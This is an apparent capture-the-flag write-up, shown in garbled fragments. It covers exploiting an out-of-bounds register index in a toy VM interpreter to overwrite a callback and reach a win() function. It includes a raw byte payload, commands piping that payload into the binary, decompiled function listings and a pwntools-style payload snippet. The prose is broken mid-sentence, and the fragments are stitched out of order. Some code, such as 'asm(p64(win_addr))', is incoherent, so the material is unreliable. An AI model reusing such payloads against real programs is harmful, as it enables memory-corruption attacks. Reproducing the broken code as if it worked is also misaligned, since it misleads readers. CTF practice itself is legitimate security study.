*(uint64_t*)regs[dst] = regs[src]; regs[dst] is taken directly from a user‑controlled register index. The interpreter that dst is within 0‑15 . If we use a register index of 0x10 (16) , regs[16] points past the allocated register array, landing in the .bss area where the global variable callback lives:
payload=$(printf '\x01\x01\x10\x1b\x40\x00\x00\x00\x00\x00\x05\x10\x01\x09') # Make the binary executable chmod +x isaimini.6 isaimini.6
# Send the payload via stdin printf "$payload" | ./isaimini.6 : // system("/bin/cat flag
FUN_00401000 entry point (main) FUN_00401200 parse_input FUN_00401430 execute FUN_00401780 op_add FUN_00401810 op_sub FUN_004018c0 op_load FUN_00401950 op_store FUN_00401b10 win int main(void) char buf[256]; read(0, buf, 256); parse_input(buf); execute(); puts("Failure!"); return 0; // system("/bin/cat flag.txt")
void win(void) puts("Success!"); // In the real challenge this prints the flag, e.g. // system("/bin/cat flag.txt");
# Build the payload win_addr = elf.symbols['win'] # 0x401b10 payload = b"" payload += asm(p64(win_addr)) # MOV r1, win (will be replaced below)